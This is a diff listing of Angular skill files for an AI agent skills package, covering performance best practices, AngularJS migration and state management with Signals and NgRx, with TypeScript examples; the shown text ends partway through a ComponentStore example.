- [Angular Performance](https://angular.dev/guide/performance)
- [Zoneless Angular](https://angular.dev/guide/zoneless)
- [Angular SSR](https://angular.dev/guide/ssr)
563
packages/llm/skills/angular-best-practices/SKILL.md
Normal file
@ -0,0 +1,563 @@
---
name: angular-best-practices
description: "Angular performance optimization and best practices guide. Use when writing, reviewing, or refactoring Angular code for optimal performance, bundle size, and rendering efficiency."
risk: safe
source: self
date_added: "2026-02-27"
---

# Angular Best Practices

Comprehensive performance optimization guide for Angular applications. Contains prioritized rules for eliminating performance bottlenecks, optimizing bundles, and improving rendering.

## When to Apply

Reference these guidelines when:

- Writing new Angular components or pages
- Implementing data fetching patterns
- Reviewing code for performance issues
- Refactoring existing Angular code
- Optimizing bundle size or load times
- Configuring SSR/hydration

---

## Rule Categories by Priority

| Priority | Category              | Impact     | Focus                           |
| -------- | --------------------- | ---------- | ------------------------------- |
| 1        | Change Detection      | CRITICAL   | Signals, OnPush, Zoneless       |
| 2        | Async Waterfalls      | CRITICAL   | RxJS patterns, SSR preloading   |
| 3        | Bundle Optimization   | CRITICAL   | Lazy loading, tree shaking      |
| 4        | Rendering Performance | HIGH       | @defer, trackBy, virtualization |
| 5        | Server-Side Rendering | HIGH       | Hydration, prerendering         |
| 6        | Template Optimization | MEDIUM     | Control flow, pipes             |
| 7        | State Management      | MEDIUM     | Signal patterns, selectors      |
| 8        | Memory Management     | LOW-MEDIUM | Cleanup, subscriptions          |

---

## 1. Change Detection (CRITICAL)

### Use OnPush Change Detection

```typescript
// CORRECT - OnPush with Signals
@Component({
  changeDetection: ChangeDetectionStrategy.OnPush,
  template: `<div>{{ count() }}</div>`,
})
export class CounterComponent {
  count = signal(0);
}

// WRONG - Default change detection
@Component({
  template: `<div>{{ count }}</div>`, // Checked every cycle
})
export class CounterComponent {
  count = 0;
}
```

### Prefer Signals Over Mutable Properties

```typescript
// CORRECT - Signals trigger precise updates
@Component({
  template: `
    <h1>{{ title() }}</h1>
    <p>Count: {{ count() }}</p>
  `,
})
export class DashboardComponent {
  title = signal("Dashboard");
  count = signal(0);
}

// WRONG - Mutable properties require zone.js checks
@Component({
  template: `
    <h1>{{ title }}</h1>
    <p>Count: {{ count }}</p>
  `,
})
export class DashboardComponent {
  title = "Dashboard";
  count = 0;
}
```

### Enable Zoneless for New Projects

```typescript
// main.ts - Zoneless Angular (v20+)
bootstrapApplication(AppComponent, {
  providers: [provideZonelessChangeDetection()],
});
```

**Benefits:**

- No zone.js patches on async APIs
- Smaller bundle (~15KB savings)
- Clean stack traces for debugging
- Better micro-frontend compatibility
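In a zoneless app, rendering is scheduled by signal writes (and other explicit notifications) rather than by zone.js patching async APIs. A minimal sketch with a hypothetical `ClockComponent` (interval cleanup omitted for brevity):

```typescript
import { Component, signal } from "@angular/core";

@Component({
  selector: "app-clock",
  standalone: true,
  template: `<span>{{ seconds() }}s</span>`,
})
export class ClockComponent {
  seconds = signal(0);

  constructor() {
    // setInterval is not patched in a zoneless app; the view still
    // updates because the signal write notifies Angular's scheduler.
    setInterval(() => this.seconds.update((s) => s + 1), 1000);
  }
}
```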
---

## 2. Async Operations & Waterfalls (CRITICAL)

### Eliminate Sequential Data Fetching

```typescript
// WRONG - Nested subscriptions create waterfalls
this.route.params.subscribe((params) => {
  // 1. Wait for params
  this.userService.getUser(params.id).subscribe((user) => {
    // 2. Wait for user
    this.postsService.getPosts(user.id).subscribe((posts) => {
      // 3. Wait for posts
    });
  });
});

// CORRECT - Parallel execution with forkJoin
forkJoin({
  user: this.userService.getUser(id),
  posts: this.postsService.getPosts(id),
}).subscribe((data) => {
  // Fetched in parallel
});

// CORRECT - Flatten dependent calls with switchMap
this.route.params
  .pipe(
    map((p) => p.id),
    switchMap((id) => this.userService.getUser(id)),
  )
  .subscribe();
```

### Avoid Client-Side Waterfalls in SSR

```typescript
// CORRECT - Use resolvers or blocking hydration for critical data
export const route: Route = {
  path: "profile/:id",
  resolve: { data: profileResolver }, // Fetched on server before navigation
  component: ProfileComponent,
};

// WRONG - Component fetches data on init
class ProfileComponent implements OnInit {
  ngOnInit() {
    // Starts ONLY after JS loads and component renders
    this.http.get("/api/profile").subscribe();
  }
}
```

---

## 3. Bundle Optimization (CRITICAL)

### Lazy Load Routes

```typescript
// CORRECT - Lazy load feature routes
export const routes: Routes = [
  {
    path: "admin",
    loadChildren: () =>
      import("./admin/admin.routes").then((m) => m.ADMIN_ROUTES),
  },
  {
    path: "dashboard",
    loadComponent: () =>
      import("./dashboard/dashboard.component").then(
        (m) => m.DashboardComponent,
      ),
  },
];

// WRONG - Eager loading everything
import { AdminModule } from "./admin/admin.module";
export const routes: Routes = [
  { path: "admin", component: AdminComponent }, // In main bundle
];
```

### Use @defer for Heavy Components

```html
<!-- CORRECT - Heavy component loads on demand -->
@defer (on viewport) {
  <app-analytics-chart [data]="data()" />
} @placeholder {
  <div class="chart-skeleton"></div>
}

<!-- WRONG - Heavy component in initial bundle -->
<app-analytics-chart [data]="data()" />
```

### Avoid Barrel File Re-exports

```typescript
// WRONG - Imports entire barrel, breaks tree-shaking
import { Button, Modal, Table } from "@shared/components";

// CORRECT - Direct imports
import { Button } from "@shared/components/button/button.component";
import { Modal } from "@shared/components/modal/modal.component";
```

### Dynamic Import Third-Party Libraries

```typescript
// CORRECT - Load heavy library on demand
async loadChart() {
  const { Chart } = await import('chart.js');
  this.chart = new Chart(this.canvas, config);
}

// WRONG - Bundle Chart.js in main chunk
import { Chart } from 'chart.js';
```

---

## 4. Rendering Performance (HIGH)

### Always Use trackBy with @for

```html
<!-- CORRECT - Efficient DOM updates -->
@for (item of items(); track item.id) {
  <app-item-card [item]="item" />
}

<!-- WRONG - Entire list re-renders on any change -->
@for (item of items(); track $index) {
  <app-item-card [item]="item" />
}
```

### Use Virtual Scrolling for Large Lists

```typescript
import {
  CdkVirtualScrollViewport,
  CdkVirtualForOf,
  CdkFixedSizeVirtualScroll,
} from '@angular/cdk/scrolling';

@Component({
  imports: [CdkVirtualScrollViewport, CdkVirtualForOf, CdkFixedSizeVirtualScroll],
  template: `
    <cdk-virtual-scroll-viewport itemSize="50" class="viewport">
      <div *cdkVirtualFor="let item of items" class="item">
        {{ item.name }}
      </div>
    </cdk-virtual-scroll-viewport>
  `
})
export class VirtualListComponent {
  items = Array.from({ length: 10000 }, (_, i) => ({ name: `Item ${i}` }));
}
```

### Prefer Pure Pipes Over Methods

```typescript
// CORRECT - Pure pipe, memoized
@Pipe({ name: 'filterActive', standalone: true, pure: true })
export class FilterActivePipe implements PipeTransform {
  transform(items: Item[]): Item[] {
    return items.filter(i => i.active);
  }
}

// Template
@for (item of items() | filterActive; track item.id) { ... }

// WRONG - Method called every change detection
@for (item of getActiveItems(); track item.id) { ... }
```

### Use computed() for Derived Data

```typescript
// CORRECT - Computed, cached until dependencies change
export class ProductStore {
  products = signal<Product[]>([]);
  filter = signal('');

  filteredProducts = computed(() => {
    const f = this.filter().toLowerCase();
    return this.products().filter(p =>
      p.name.toLowerCase().includes(f)
    );
  });
}

// WRONG - Recalculates every access
get filteredProducts() {
  return this.products.filter(p =>
    p.name.toLowerCase().includes(this.filter)
  );
}
```

---

## 5. Server-Side Rendering (HIGH)

### Configure Incremental Hydration

```typescript
// app.config.ts
import {
  provideClientHydration,
  withIncrementalHydration,
  withEventReplay,
} from "@angular/platform-browser";

export const appConfig: ApplicationConfig = {
  providers: [
    provideClientHydration(withIncrementalHydration(), withEventReplay()),
  ],
};
```

### Defer Non-Critical Content

```html
<!-- Critical above-the-fold content -->
<app-header />
<app-hero />

<!-- Below-fold deferred with hydration triggers -->
@defer (hydrate on viewport) {
  <app-product-grid />
} @defer (hydrate on interaction) {
  <app-chat-widget />
}
```

### Use TransferState for SSR Data

```typescript
@Injectable({ providedIn: "root" })
export class DataService {
  private http = inject(HttpClient);
  private transferState = inject(TransferState);
  private platformId = inject(PLATFORM_ID);

  getData(key: string): Observable<Data> {
    const stateKey = makeStateKey<Data>(key);

    if (isPlatformBrowser(this.platformId)) {
      const cached = this.transferState.get(stateKey, null);
      if (cached) {
        this.transferState.remove(stateKey);
        return of(cached);
      }
    }

    return this.http.get<Data>(`/api/${key}`).pipe(
      tap((data) => {
        if (isPlatformServer(this.platformId)) {
          this.transferState.set(stateKey, data);
        }
      }),
    );
  }
}
```

---

## 6. Template Optimization (MEDIUM)

### Use New Control Flow Syntax

```html
<!-- CORRECT - New control flow (faster, smaller bundle) -->
@if (user()) {
  <span>{{ user()!.name }}</span>
} @else {
  <span>Guest</span>
}
@for (item of items(); track item.id) {
  <app-item [item]="item" />
} @empty {
  <p>No items</p>
}

<!-- WRONG - Legacy structural directives -->
<span *ngIf="user; else guest">{{ user.name }}</span>
<ng-template #guest><span>Guest</span></ng-template>
```

### Avoid Complex Template Expressions

```typescript
// CORRECT - Precompute in component
class Component {
  items = signal<Item[]>([]);
  sortedItems = computed(() =>
    [...this.items()].sort((a, b) => a.name.localeCompare(b.name))
  );
}

// Template
@for (item of sortedItems(); track item.id) { ... }

// WRONG - Sorting in template every render
@for (item of items() | sort:'name'; track item.id) { ... }
```

---

## 7. State Management (MEDIUM)

### Use Selectors to Prevent Re-renders

```typescript
// CORRECT - Selective subscription
@Component({
  template: `<span>{{ userName() }}</span>`,
})
class HeaderComponent {
  private store = inject(Store);
  // Only re-renders when userName changes
  userName = this.store.selectSignal(selectUserName);
}

// WRONG - Subscribing to entire state
@Component({
  template: `<span>{{ state().user.name }}</span>`,
})
class HeaderComponent {
  private store = inject(Store);
  // Re-renders on ANY state change
  state = toSignal(this.store);
}
```

### Colocate State with Features

```typescript
// CORRECT - Feature-scoped store
@Injectable() // NOT providedIn: 'root'
export class ProductStore { ... }

@Component({
  providers: [ProductStore], // Scoped to component tree
})
export class ProductPageComponent {
  store = inject(ProductStore);
}

// WRONG - Everything in global store
@Injectable({ providedIn: 'root' })
export class GlobalStore {
  // Contains ALL app state - hard to tree-shake
}
```

---

## 8. Memory Management (LOW-MEDIUM)

### Use takeUntilDestroyed for Subscriptions

```typescript
import { takeUntilDestroyed } from '@angular/core/rxjs-interop';

@Component({...})
export class DataComponent {
  private destroyRef = inject(DestroyRef);

  constructor() {
    this.data$.pipe(
      takeUntilDestroyed(this.destroyRef)
    ).subscribe(data => this.process(data));
  }
}

// WRONG - Manual subscription management
export class DataComponent implements OnDestroy {
  private subscription!: Subscription;

  ngOnInit() {
    this.subscription = this.data$.subscribe(...);
  }

  ngOnDestroy() {
    this.subscription.unsubscribe(); // Easy to forget
  }
}
```

### Prefer Signals Over Subscriptions

```typescript
// CORRECT - No subscription needed
@Component({
  template: `<div>{{ data().name }}</div>`,
})
export class Component {
  data = toSignal(this.service.data$, { initialValue: null });
}

// WRONG - Manual subscription
@Component({
  template: `<div>{{ data?.name }}</div>`,
})
export class Component implements OnInit, OnDestroy {
  data: Data | null = null;
  private sub!: Subscription;

  ngOnInit() {
    this.sub = this.service.data$.subscribe((d) => (this.data = d));
  }

  ngOnDestroy() {
    this.sub.unsubscribe();
  }
}
```

---

## Quick Reference Checklist

### New Component

- [ ] `changeDetection: ChangeDetectionStrategy.OnPush`
- [ ] `standalone: true`
- [ ] Signals for state (`signal()`, `input()`, `output()`)
- [ ] `inject()` for dependencies
- [ ] `@for` with `track` expression

### Performance Review

- [ ] No methods in templates (use pipes or computed)
- [ ] Large lists virtualized
- [ ] Heavy components deferred
- [ ] Routes lazy-loaded
- [ ] Third-party libs dynamically imported

### SSR Check

- [ ] Hydration configured
- [ ] Critical content renders first
- [ ] Non-critical content uses `@defer (hydrate on ...)`
- [ ] TransferState for server-fetched data

---

## Resources

- [Angular Performance Guide](https://angular.dev/best-practices/performance)
- [Zoneless Angular](https://angular.dev/guide/experimental/zoneless)
- [Angular SSR Guide](https://angular.dev/guide/ssr)
- [Change Detection Deep Dive](https://angular.dev/guide/change-detection)

## When to Use

Use this skill when writing, reviewing, or refactoring Angular code for performance, as described in the overview above.
13
packages/llm/skills/angular-best-practices/metadata.json
Normal file
@ -0,0 +1,13 @@
{
  "version": "1.0.0",
  "organization": "Antigravity Awesome Skills",
  "date": "February 2026",
  "abstract": "Performance optimization and best practices guide for Angular applications designed for AI agents and LLMs. Covers change detection strategies (OnPush, Signals, Zoneless), avoiding async waterfalls, bundle optimization with lazy loading and @defer, rendering performance, SSR/hydration patterns, and memory management. Prioritized by impact from critical to incremental improvements.",
  "references": [
    "https://angular.dev/best-practices",
    "https://angular.dev/guide/performance",
    "https://angular.dev/guide/zoneless",
    "https://angular.dev/guide/ssr",
    "https://web.dev/performance"
  ]
}
431
packages/llm/skills/angular-migration/SKILL.md
Normal file
@ -0,0 +1,431 @@
---
name: angular-migration
description: "Migrate from AngularJS to Angular using hybrid mode, incremental component rewriting, and dependency injection updates. Use when upgrading AngularJS applications, planning framework migrations, or ..."
risk: unknown
source: community
date_added: "2026-02-27"
---

# Angular Migration

Master AngularJS-to-Angular migration, including hybrid apps, component conversion, dependency injection changes, and routing migration.

## Use this skill when

- Migrating AngularJS (1.x) applications to Angular (2+)
- Running hybrid AngularJS/Angular applications
- Converting directives to components
- Modernizing dependency injection
- Migrating routing systems
- Updating to the latest Angular versions
- Implementing Angular best practices

## Do not use this skill when

- You are not migrating from AngularJS to Angular
- The app is already on a modern Angular version
- You need only a small UI fix without framework changes

## Instructions

1. Assess the AngularJS codebase, dependencies, and migration risks.
2. Choose a migration strategy (hybrid vs. rewrite) and define milestones.
3. Set up ngUpgrade and migrate modules, components, and routing.
4. Validate with tests and plan a safe cutover.

## Safety

- Avoid big-bang cutovers without rollback and staging validation.
- Keep testing hybrid compatibility throughout the incremental migration.

## Migration Strategies

### 1. Big Bang (Complete Rewrite)

- Rewrite the entire app in Angular
- Parallel development
- Switch over at once
- **Best for:** Small apps, greenfield projects

### 2. Incremental (Hybrid Approach)

- Run AngularJS and Angular side by side
- Migrate feature by feature
- ngUpgrade for interop
- **Best for:** Large apps, continuous delivery

### 3. Vertical Slice

- Migrate one feature completely
- Build new features in Angular, maintain old ones in AngularJS
- Gradually replace
- **Best for:** Medium apps, distinct features

## Hybrid App Setup

```typescript
// main.ts - Bootstrap hybrid app
import { platformBrowserDynamic } from '@angular/platform-browser-dynamic';
import { UpgradeModule } from '@angular/upgrade/static';
import { AppModule } from './app/app.module';

platformBrowserDynamic()
  .bootstrapModule(AppModule)
  .then(platformRef => {
    const upgrade = platformRef.injector.get(UpgradeModule);
    // Bootstrap AngularJS
    upgrade.bootstrap(document.body, ['myAngularJSApp'], { strictDi: true });
  });
```

```typescript
// app.module.ts
import { NgModule } from '@angular/core';
import { BrowserModule } from '@angular/platform-browser';
import { UpgradeModule } from '@angular/upgrade/static';

@NgModule({
  imports: [
    BrowserModule,
    UpgradeModule
  ]
})
export class AppModule {
  constructor(private upgrade: UpgradeModule) {}

  ngDoBootstrap() {
    // Bootstrapped manually in main.ts
  }
}
```

## Component Migration

### AngularJS Controller → Angular Component

```javascript
// Before: AngularJS controller
angular.module('myApp').controller('UserController', function($scope, UserService) {
  $scope.user = {};

  $scope.loadUser = function(id) {
    UserService.getUser(id).then(function(user) {
      $scope.user = user;
    });
  };

  $scope.saveUser = function() {
    UserService.saveUser($scope.user);
  };
});
```

```typescript
// After: Angular component
import { Component, OnInit } from '@angular/core';
import { UserService } from './user.service';

@Component({
  selector: 'app-user',
  template: `
    <div>
      <h2>{{ user.name }}</h2>
      <button (click)="saveUser()">Save</button>
    </div>
  `
})
export class UserComponent implements OnInit {
  user: any = {};

  constructor(private userService: UserService) {}

  ngOnInit() {
    this.loadUser(1);
  }

  loadUser(id: number) {
    this.userService.getUser(id).subscribe(user => {
      this.user = user;
    });
  }

  saveUser() {
    this.userService.saveUser(this.user);
  }
}
```

### AngularJS Directive → Angular Component

```javascript
// Before: AngularJS directive
angular.module('myApp').directive('userCard', function() {
  return {
    restrict: 'E',
    scope: {
      user: '=',
      onDelete: '&'
    },
    template: `
      <div class="card">
        <h3>{{ user.name }}</h3>
        <button ng-click="onDelete()">Delete</button>
      </div>
    `
  };
});
```

```typescript
// After: Angular component
import { Component, Input, Output, EventEmitter } from '@angular/core';

@Component({
  selector: 'app-user-card',
  template: `
    <div class="card">
      <h3>{{ user.name }}</h3>
      <button (click)="delete.emit()">Delete</button>
    </div>
  `
})
export class UserCardComponent {
  @Input() user: any;
  @Output() delete = new EventEmitter<void>();
}

// Usage: <app-user-card [user]="user" (delete)="handleDelete()"></app-user-card>
```

## Service Migration

```javascript
// Before: AngularJS service
angular.module('myApp').factory('UserService', function($http) {
  return {
    getUser: function(id) {
      return $http.get('/api/users/' + id);
    },
    saveUser: function(user) {
      return $http.post('/api/users', user);
    }
  };
});
```

```typescript
// After: Angular service
import { Injectable } from '@angular/core';
import { HttpClient } from '@angular/common/http';
import { Observable } from 'rxjs';

@Injectable({
  providedIn: 'root'
})
export class UserService {
  constructor(private http: HttpClient) {}

  getUser(id: number): Observable<any> {
    return this.http.get(`/api/users/${id}`);
  }

  saveUser(user: any): Observable<any> {
    return this.http.post('/api/users', user);
  }
}
```

## Dependency Injection Changes

### Downgrading Angular → AngularJS

```typescript
// Angular service
import { Injectable } from '@angular/core';

@Injectable({ providedIn: 'root' })
export class NewService {
  getData() {
    return 'data from Angular';
  }
}

// Make available to AngularJS
import { downgradeInjectable } from '@angular/upgrade/static';

angular.module('myApp')
  .factory('newService', downgradeInjectable(NewService));

// Use in AngularJS
angular.module('myApp').controller('OldController', function(newService) {
  console.log(newService.getData());
});
```

### Upgrading AngularJS → Angular

```typescript
// AngularJS service
angular.module('myApp').factory('oldService', function() {
  return {
    getData: function() {
      return 'data from AngularJS';
    }
  };
});

// Make available to Angular
import { InjectionToken } from '@angular/core';

export const OLD_SERVICE = new InjectionToken<any>('oldService');

@NgModule({
  providers: [
    {
      provide: OLD_SERVICE,
      useFactory: (i: any) => i.get('oldService'),
      deps: ['$injector']
    }
  ]
})
export class AppModule {}

// Use in Angular
@Component({...})
export class NewComponent {
  constructor(@Inject(OLD_SERVICE) private oldService: any) {
    console.log(this.oldService.getData());
  }
}
```

## Routing Migration

```javascript
// Before: AngularJS routing
angular.module('myApp').config(function($routeProvider) {
  $routeProvider
    .when('/users', {
      template: '<user-list></user-list>'
    })
    .when('/users/:id', {
      template: '<user-detail></user-detail>'
    });
});
```

```typescript
// After: Angular routing
import { NgModule } from '@angular/core';
import { RouterModule, Routes } from '@angular/router';

const routes: Routes = [
  { path: 'users', component: UserListComponent },
  { path: 'users/:id', component: UserDetailComponent }
];

@NgModule({
  imports: [RouterModule.forRoot(routes)],
  exports: [RouterModule]
})
export class AppRoutingModule {}
```

## Forms Migration

```html
<!-- Before: AngularJS -->
<form name="userForm" ng-submit="saveUser()">
  <input type="text" ng-model="user.name" required>
  <input type="email" ng-model="user.email" required>
  <button ng-disabled="userForm.$invalid">Save</button>
</form>
```

```typescript
// After: Angular (template-driven)
@Component({
  template: `
    <form #userForm="ngForm" (ngSubmit)="saveUser()">
      <input type="text" [(ngModel)]="user.name" name="name" required>
      <input type="email" [(ngModel)]="user.email" name="email" required>
      <button [disabled]="userForm.invalid">Save</button>
    </form>
  `
})

// Or reactive forms (preferred)
import { FormBuilder, FormGroup, Validators } from '@angular/forms';

@Component({
  template: `
    <form [formGroup]="userForm" (ngSubmit)="saveUser()">
      <input formControlName="name">
      <input formControlName="email">
      <button [disabled]="userForm.invalid">Save</button>
    </form>
  `
})
export class UserFormComponent {
  userForm: FormGroup;

  constructor(private fb: FormBuilder) {
    this.userForm = this.fb.group({
      name: ['', Validators.required],
      email: ['', [Validators.required, Validators.email]]
    });
  }

  saveUser() {
    console.log(this.userForm.value);
  }
}
```

## Migration Timeline

```
Phase 1: Setup (1-2 weeks)
- Install Angular CLI
- Set up hybrid app
- Configure build tools
- Set up testing

Phase 2: Infrastructure (2-4 weeks)
- Migrate services
- Migrate utilities
- Set up routing
- Migrate shared components

Phase 3: Feature Migration (varies)
- Migrate feature by feature
- Test thoroughly
- Deploy incrementally

Phase 4: Cleanup (1-2 weeks)
- Remove AngularJS code
- Remove ngUpgrade
- Optimize bundle
- Final testing
```

## Resources

- **references/hybrid-mode.md**: Hybrid app patterns
- **references/component-migration.md**: Component conversion guide
- **references/dependency-injection.md**: DI migration strategies
- **references/routing.md**: Routing migration
- **assets/hybrid-bootstrap.ts**: Hybrid app template
- **assets/migration-timeline.md**: Project planning
- **scripts/analyze-angular-app.sh**: App analysis script

## Best Practices

1. **Start with services**: Migrate services first (easier)
2. **Incremental approach**: Feature-by-feature migration
3. **Test continuously**: Test at every step
4. **Use TypeScript**: Migrate to TypeScript early
5. **Follow the style guide**: Apply the Angular style guide from day 1
6. **Optimize later**: Get it working, then optimize
7. **Document**: Keep migration notes

## Common Pitfalls

- Not setting up the hybrid app correctly
- Migrating UI before logic
- Ignoring change detection differences
- Not handling scope properly
- Mixing patterns (AngularJS + Angular)
- Inadequate testing
41
packages/llm/skills/angular-state-management/README.md
Normal file
@ -0,0 +1,41 @@
# Angular State Management

Complete state management patterns for Angular applications optimized for AI agents and LLMs.

## Overview

This skill provides decision frameworks and implementation patterns for:

- **Signal-based Services** - Lightweight state for shared data
- **NgRx SignalStore** - Feature-scoped state with computed values
- **NgRx Store** - Enterprise-scale global state management
- **RxJS ComponentStore** - Reactive component-level state
- **Forms State** - Reactive and template-driven form patterns

## Structure

The `SKILL.md` file is organized into:

1. **State Categories** - Local, shared, global, server, URL, and form state
2. **Selection Criteria** - Decision trees for choosing the right solution
3. **Implementation Patterns** - Complete examples for each approach
4. **Migration Guides** - Moving from BehaviorSubject to Signals
5. **Bridging Patterns** - Integrating Signals with RxJS

## When to Use Each Pattern

- **Signal Service**: Shared UI state (theme, user preferences)
- **NgRx SignalStore**: Feature state with computed values
- **NgRx Store**: Complex cross-feature dependencies
- **ComponentStore**: Component-scoped async operations
- **Reactive Forms**: Form state with validation

## Version

Current version: 1.0.0 (February 2026)

## References

- [Angular Signals](https://angular.dev/guide/signals)
- [NgRx](https://ngrx.io)
- [NgRx SignalStore](https://ngrx.io/guide/signals)
635
packages/llm/skills/angular-state-management/SKILL.md
Normal file
@ -0,0 +1,635 @@
---
name: angular-state-management
description: "Master modern Angular state management with Signals, NgRx, and RxJS. Use when setting up global state, managing component stores, choosing between state solutions, or migrating from legacy patterns."
risk: safe
source: self
date_added: "2026-02-27"
---

# Angular State Management

Comprehensive guide to modern Angular state management patterns, from Signal-based local state to global stores and server state synchronization.

## When to Use This Skill

- Setting up global state management in Angular
- Choosing between Signals, NgRx, or Akita
- Managing component-level stores
- Implementing optimistic updates
- Debugging state-related issues
- Migrating from legacy state patterns

## Do Not Use This Skill When

- The task is unrelated to Angular state management
- You need React state management → use `react-state-management`

---

## Core Concepts

### State Categories

| Type             | Description                  | Solutions             |
| ---------------- | ---------------------------- | --------------------- |
| **Local State**  | Component-specific, UI state | Signals, `signal()`   |
| **Shared State** | Between related components   | Signal services       |
| **Global State** | App-wide, complex            | NgRx, Akita, Elf      |
| **Server State** | Remote data, caching         | NgRx Query, RxAngular |
| **URL State**    | Route parameters             | ActivatedRoute        |
| **Form State**   | Input values, validation     | Reactive Forms        |

### Selection Criteria

```
Small app, simple state    → Signal Services
Medium app, moderate state → Component Stores
Large app, complex state   → NgRx Store
Heavy server interaction   → NgRx Query + Signal Services
Real-time updates          → RxAngular + Signals
```

---

## Quick Start: Signal-Based State

### Pattern 1: Simple Signal Service

```typescript
// services/counter.service.ts
import { Injectable, signal, computed } from "@angular/core";

@Injectable({ providedIn: "root" })
export class CounterService {
  // Private writable signals
  private _count = signal(0);

  // Public read-only
  readonly count = this._count.asReadonly();
  readonly doubled = computed(() => this._count() * 2);
  readonly isPositive = computed(() => this._count() > 0);

  increment() {
    this._count.update((v) => v + 1);
  }

  decrement() {
    this._count.update((v) => v - 1);
  }

  reset() {
    this._count.set(0);
  }
}

// Usage in component
@Component({
  template: `
    <p>Count: {{ counter.count() }}</p>
    <p>Doubled: {{ counter.doubled() }}</p>
    <button (click)="counter.increment()">+</button>
  `,
})
export class CounterComponent {
  counter = inject(CounterService);
}
```

### Pattern 2: Feature Signal Store

```typescript
// stores/user.store.ts
import { Injectable, signal, computed, inject } from "@angular/core";
import { HttpClient } from "@angular/common/http";
import { firstValueFrom } from "rxjs";

interface User {
  id: string;
  name: string;
  email: string;
}

interface UserState {
  user: User | null;
  loading: boolean;
  error: string | null;
}

@Injectable({ providedIn: "root" })
export class UserStore {
  private http = inject(HttpClient);

  // State signals
  private _user = signal<User | null>(null);
  private _loading = signal(false);
  private _error = signal<string | null>(null);

  // Selectors (read-only computed)
  readonly user = computed(() => this._user());
  readonly loading = computed(() => this._loading());
  readonly error = computed(() => this._error());
  readonly isAuthenticated = computed(() => this._user() !== null);
  readonly displayName = computed(() => this._user()?.name ?? "Guest");

  // Actions
  async loadUser(id: string) {
    this._loading.set(true);
    this._error.set(null);

    try {
      const user = await firstValueFrom(
        this.http.get<User>(`/api/users/${id}`),
      );
      this._user.set(user);
    } catch (e) {
      this._error.set("Failed to load user");
    } finally {
      this._loading.set(false);
    }
  }

  updateUser(updates: Partial<User>) {
    this._user.update((user) => (user ? { ...user, ...updates } : null));
  }

  logout() {
    this._user.set(null);
    this._error.set(null);
  }
}
```

### Pattern 3: SignalStore (NgRx Signals)

```typescript
// stores/products.store.ts
import {
  signalStore,
  withState,
  withMethods,
  withComputed,
  patchState,
} from "@ngrx/signals";
import { computed, inject } from "@angular/core";
import { ProductService } from "./product.service";

interface ProductState {
  products: Product[];
  loading: boolean;
  filter: string;
}

const initialState: ProductState = {
  products: [],
  loading: false,
  filter: "",
};

export const ProductStore = signalStore(
  { providedIn: "root" },

  withState(initialState),

  withComputed((store) => ({
    filteredProducts: computed(() => {
      const filter = store.filter().toLowerCase();
      return store
        .products()
        .filter((p) => p.name.toLowerCase().includes(filter));
    }),
    totalCount: computed(() => store.products().length),
  })),

  withMethods((store, productService = inject(ProductService)) => ({
    async loadProducts() {
      patchState(store, { loading: true });

      try {
        const products = await productService.getAll();
        patchState(store, { products, loading: false });
      } catch {
        patchState(store, { loading: false });
      }
    },

    setFilter(filter: string) {
      patchState(store, { filter });
    },

    addProduct(product: Product) {
      patchState(store, ({ products }) => ({
        products: [...products, product],
      }));
    },
  })),
);

// Usage
@Component({
  template: `
    <input (input)="store.setFilter($event.target.value)" />
    @if (store.loading()) {
      <app-spinner />
    } @else {
      @for (product of store.filteredProducts(); track product.id) {
        <app-product-card [product]="product" />
      }
    }
  `,
})
export class ProductListComponent {
  store = inject(ProductStore);

  ngOnInit() {
    this.store.loadProducts();
  }
}
```

---

## NgRx Store (Global State)

### Setup

```typescript
// store/app.state.ts
import { ActionReducerMap } from "@ngrx/store";

export interface AppState {
  user: UserState;
  cart: CartState;
}

export const reducers: ActionReducerMap<AppState> = {
  user: userReducer,
  cart: cartReducer,
};

// main.ts
bootstrapApplication(AppComponent, {
  providers: [
    provideStore(reducers),
    provideEffects([UserEffects, CartEffects]),
    provideStoreDevtools({ maxAge: 25 }),
  ],
});
```

### Feature Slice Pattern

```typescript
// store/user/user.actions.ts
import { createActionGroup, props, emptyProps } from "@ngrx/store";

export const UserActions = createActionGroup({
  source: "User",
  events: {
    "Load User": props<{ userId: string }>(),
    "Load User Success": props<{ user: User }>(),
    "Load User Failure": props<{ error: string }>(),
    "Update User": props<{ updates: Partial<User> }>(),
    Logout: emptyProps(),
  },
});
```

```typescript
// store/user/user.reducer.ts
import { createReducer, on } from "@ngrx/store";
import { UserActions } from "./user.actions";

export interface UserState {
  user: User | null;
  loading: boolean;
  error: string | null;
}

const initialState: UserState = {
  user: null,
  loading: false,
  error: null,
};

export const userReducer = createReducer(
  initialState,

  on(UserActions.loadUser, (state) => ({
    ...state,
    loading: true,
    error: null,
  })),

  on(UserActions.loadUserSuccess, (state, { user }) => ({
    ...state,
    user,
    loading: false,
  })),

  on(UserActions.loadUserFailure, (state, { error }) => ({
    ...state,
    loading: false,
    error,
  })),

  on(UserActions.logout, () => initialState),
);
```

```typescript
// store/user/user.selectors.ts
import { createFeatureSelector, createSelector } from "@ngrx/store";
import { UserState } from "./user.reducer";

export const selectUserState = createFeatureSelector<UserState>("user");

export const selectUser = createSelector(
  selectUserState,
  (state) => state.user,
);

export const selectUserLoading = createSelector(
  selectUserState,
  (state) => state.loading,
);

export const selectIsAuthenticated = createSelector(
  selectUser,
  (user) => user !== null,
);
```

```typescript
// store/user/user.effects.ts
import { Injectable, inject } from "@angular/core";
import { Actions, createEffect, ofType } from "@ngrx/effects";
import { switchMap, map, catchError, of } from "rxjs";
import { UserActions } from "./user.actions";
import { UserService } from "./user.service";

@Injectable()
export class UserEffects {
  private actions$ = inject(Actions);
  private userService = inject(UserService);

  loadUser$ = createEffect(() =>
    this.actions$.pipe(
      ofType(UserActions.loadUser),
      switchMap(({ userId }) =>
        this.userService.getUser(userId).pipe(
          map((user) => UserActions.loadUserSuccess({ user })),
          catchError((error) =>
            of(UserActions.loadUserFailure({ error: error.message })),
          ),
        ),
      ),
    ),
  );
}
```

### Component Usage

```typescript
@Component({
  template: `
    @if (loading()) {
      <app-spinner />
    } @else if (user(); as user) {
      <h1>Welcome, {{ user.name }}</h1>
      <button (click)="logout()">Logout</button>
    }
  `,
})
export class HeaderComponent {
  private store = inject(Store);

  user = this.store.selectSignal(selectUser);
  loading = this.store.selectSignal(selectUserLoading);

  logout() {
    this.store.dispatch(UserActions.logout());
  }
}
```

---

## RxJS-Based Patterns

### Component Store (Local Feature State)

```typescript
// stores/todo.store.ts
import { Injectable } from "@angular/core";
import { ComponentStore } from "@ngrx/component-store";
import { switchMap, tap, catchError, EMPTY } from "rxjs";

interface TodoState {
  todos: Todo[];
  loading: boolean;
}

@Injectable()
